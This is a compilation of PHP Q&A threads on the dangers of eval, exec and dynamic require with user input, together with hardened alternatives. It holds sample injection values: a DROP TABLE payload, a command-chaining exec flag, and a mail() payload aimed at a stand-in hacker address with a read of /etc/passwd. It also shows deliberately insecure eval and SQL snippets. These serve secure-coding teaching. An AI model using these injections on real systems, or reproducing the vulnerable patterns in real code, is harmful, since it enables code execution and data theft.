Eval in PHP and security measures, Creating a PHP demo editor - php

I know that eval is the function in PHP to execute PHP code from an input. Now I want to make a W3Schools-like editor. What can I do to protect the eval code that I get from the POST variable?
$code = eval($_POST["phpusercode"]);
echo $code;
What I want to do is, when a user writes a function like this,
I want to give the user the ability to write his own PHP code on my site without making my website vulnerable to some sort of hacking.

eval evaluates code, so, as @sectus says in the comments, it executes the code.
For example:
eval("echo 'Hello user';"); // This will execute echo 'Hello user';
So, in your case I think you don't want to execute your user code, so please clarify your question and update it.
IMPORTANT:
Use of eval is highly discouraged.
NEVER EVER use eval with params from POST/GET without sanitizing them.
Useful links:
When eval is evil
Avoid SQL injection

Related

Is it safe to get user data with code eval("\$name= \"$input\";"), where $input comes from the user?

$input = $_GET['name'];
eval("\$name= \"$input\";");
Or is it insecure? Thanks. Without any PHP functions, like preg_replace or any other, just working with user data as string type with \" when putting it into the eval function.
This basically will allow the user to inject arbitrary code into your application. Think of something along the lines of
$input=";mysql_query(\"DROP TABLE users\")"
Also, eval makes it basically impossible to cache anything, but that is a minor consequence.

Is it possible to inject php code via input fields?

I haven't found this question on here yet, and I have done some quick Google research on this, but I couldn't really find a clear or good answer to this question.
Is it possible to inject a piece of PHP code in an input field that would actually work?
// for instance.
// I'll fill in '"test()"' in the field.
<input type="text" name="input" value="'"test()"'">
$injection = $_POST/*(or $_GET)*/['input']; // coming from the input
function test() {
    echo "injection successful";
}
So is this possible?
It is possible, but not like that. If you do what you do in your script, then the code would just be assigned as-is (as a string) to the variable $injection.
You can however execute it like this:
$injection = $_POST/*(or $_GET)*/['input'];
eval($injection);
There are other ways as well, but all have the same issue: you must actually evaluate the string as code to execute it. eval is the most obvious solution for that.
But be very careful when you implement this! If you open such a form to the outside world, everybody can execute any script, including ones that might destroy your server or steal your passwords.
The snippet you posted is harmless, but depending on what you do with user-supplied data, it can be used in a code-injection attack. The linked wiki has some examples; here's a couple of them:
$posted = $_POST['user_input'];
eval($posted); // <--- NEVER DO THIS
However, after 10 years, I've never ever even gotten close to the point where I had to even worry about dreaming of having to maybe go down this route.
Another, slightly less unlikely possible vulnerability is improper escaping when passing user data to exec:
$cmdArgument = $_POST['flag'];
exec('ls '.$cmdArgument, $return, $status);
Could leave you vulnerable if I passed this as a "flag" value:
-lta && /usr/bin/env php -r 'echo __DIR__;'
and use that input to start messing around with your file system.
To protect against this, use the escapeshellarg and escapeshellcmd functions to sanitize the input.
More common, equally dangerous, but easier to overlook, would be this:
$requested = $_GET['page'];
require $requested.'.php';
Instead, if you want to require scripts like this, a safer, and just as easy approach is this:
switch ($_GET['page'])
{
    case 'admin':
        require 'admin.php';
        break;
    case 'user':
        require 'user.php';
        break;
    default:
        require 'error.php';
        break;
}
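As an added example (not code from any of the posted answers), here are hardened forms of the two sinks discussed in this answer: the shell option is validated and wrapped with escapeshellarg(), and the page name is resolved through a fixed allowlist array instead of being concatenated into require. The function names, page names and file paths are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hardened versions of the exec() and require patterns above.
// Function names, page names and file paths are assumed for illustration.

/**
 * Run `ls` with a user-supplied option without letting the shell parse it.
 * escapeshellarg() wraps the whole value in single quotes, so a value such as
 * "-lta && ..." is passed as one literal argument, not as a command chain.
 */
function listWithFlag(string $flag): array
{
    // Allow only a short plain option string; reject anything else up front.
    if (!preg_match('/^-[A-Za-z]{1,5}$/', $flag)) {
        throw new InvalidArgumentException('Invalid ls option');
    }
    exec('ls ' . escapeshellarg($flag), $output, $status);
    if ($status !== 0) {
        throw new RuntimeException("ls failed with status $status");
    }
    return $output;
}

/**
 * Map a request parameter to a script path through a fixed allowlist.
 * The user value is only ever used as an array key, never as part of a path,
 * so "../" or a remote URL in the parameter can never reach require.
 */
function resolvePage(string $requested): string
{
    $pages = [
        'admin' => __DIR__ . '/admin.php', // assumed file names
        'user'  => __DIR__ . '/user.php',
    ];
    return $pages[$requested] ?? __DIR__ . '/error.php';
}

// Usage (assumed request parameters):
$flag = $_POST['flag'] ?? '-l';
$listing = listWithFlag($flag);
require resolvePage($_GET['page'] ?? '');
```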
The PHP exec command can execute code posted to the server. Otherwise, PHP code written in a text box will not be interpreted as PHP but just as a normal string.

Convert string to php action/function

I'm using Yii framework.
I want to turn a PHP string into a PHP action.
$var = 'echo "hello";';
// Something to do to run $var
I want to print $var; how can I do that?
Is there a simple "parse PHP from string" option in the Yii framework?
You may use the eval() function. But eval is evil in many cases, and generally such a way of coding makes code harder to follow and debug. Beware of potentially unsafe input from the user, because if, for instance, you do
eval('echo "$var";');
and $var was set directly from $_POST, one may set
$var = 'lol"; mail("hacker@somewhere.com", "Some passwords", "/bin/cat /etc/passwd");' (provided that the webserver runs under a user that may have access to such functions and directories; even if not, it gives plenty of opportunities to exploit such a vulnerability). So, generally eval is a bad idea, but sometimes it is the only solution. Anyway, be very careful.
eval — Evaluate a string as PHP code
Evaluates the given code as PHP.
Caution
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
http://php.net/manual/en/function.eval.php
$this->evaluateExpression($var);

PHP code in SQL displayed in page

I want to be able to store PHP code in an SQL Database and display that whenever it is called. I don't want to use include and make loads of files. I want to be able to just put them all in SQL and call them when I want. How can I do this?
I have
$GETPAGE = "SELECT PA_CONTENT from pages where PA_NAME = '$page'";
$GETPAGE2 = mysql_query($GETPAGE);
$GETPAGE3 = mysql_fetch_array($GETPAGE2);
echo $GETPAGE3['PA_CONTENT'];
but it echoes it out as visible text. Should I replace echo with something else?
Thanks
You can use eval() to execute code that's in strings. Just make sure that you absolutely trust the code that's being run: it will run any PHP code it's given, so it could do malicious things if it's so instructed.
You can evaluate a string as code by using eval()
http://php.net/manual/en/function.eval.php
BUT this is not recommended; see also the warning on that page:
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

$_GET['user'] security vulnerability in PHP

I'm posting this for clarification in a specific situation, though user input sanitization/validation is a cliché subject.
A section of the code contains
$haystack=$_GET['user'];
$input is never used for 'echo' or 'print' or in any SQL query or in any such thing. The only further use of the user input ( $haystack ) is to check if the string contains a predefined $needle.
if (preg_match($needle, $haystack)) {
    $result = "A";
} else {
    $result = "B";
}
My worry is the execution of a malicious code, rather than the presence of it in the user input.
So the question is: if the user input is used only in the context mentioned above (no usage in echo, print, SQL etc.), is there still a possibility of malicious code in the user input getting executed?
I wanted to add only the security measures that are required for the context rather than overdoing it.
If used only in that context, there's no way to execute malicious code from the user input.
You should be careful with eval, preg_replace (with modifier e, thanks Pelshoff), database queries and echo (& print, sprintf…).
It's not possible to just execute arbitrary code by being able to alter a string. Only when you output the string directly, or use it in SQL, should you be really worried.
preg_match won't end up executing your input. It's too simple and straightforward to have a hidden exploitable bug. If you toss $haystack after running preg_match on it, then it can't possibly hurt you.
While the $haystack may not be reflected, it can obviously affect program flow. The (extremely short) code you posted certainly doesn't look directly vulnerable, but not sanitizing your input may enable code execution in conjunction with other vulnerabilities.
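As an added example (not code from any of the posted answers), this shows the safe shape the answers describe, where the request value is only ever the subject of preg_match() against a fixed pattern, and goes one step further for the case where a user value does have to appear inside the pattern, using preg_quote() so it is matched literally. NEEDLE, the result labels and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: the pattern is a fixed string; the request value is only the
// subject of preg_match(). The pattern, labels and function names are assumed.

const NEEDLE = '/\badmin\b/i'; // assumed predefined $needle

function classifyUser(string $haystack): string
{
    // preg_match() never interprets its subject as a pattern or as code, so the
    // subject cannot change what the regex does.
    $r = preg_match(NEEDLE, $haystack);
    if ($r === false) {
        // Engine error (e.g. backtrack limit hit), not a match failure.
        throw new RuntimeException('preg_match failed: ' . preg_last_error_msg());
    }
    return $r === 1 ? 'A' : 'B';
}

/**
 * If a user value must become part of the pattern itself, escape it with
 * preg_quote() so regex metacharacters in it are matched literally and
 * the user cannot alter the structure of the expression.
 */
function containsLiteral(string $haystack, string $userTerm): bool
{
    $pattern = '/' . preg_quote($userTerm, '/') . '/i';
    return preg_match($pattern, $haystack) === 1;
}

// Usage (assumed request parameter):
$result = classifyUser($_GET['user'] ?? '');
```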
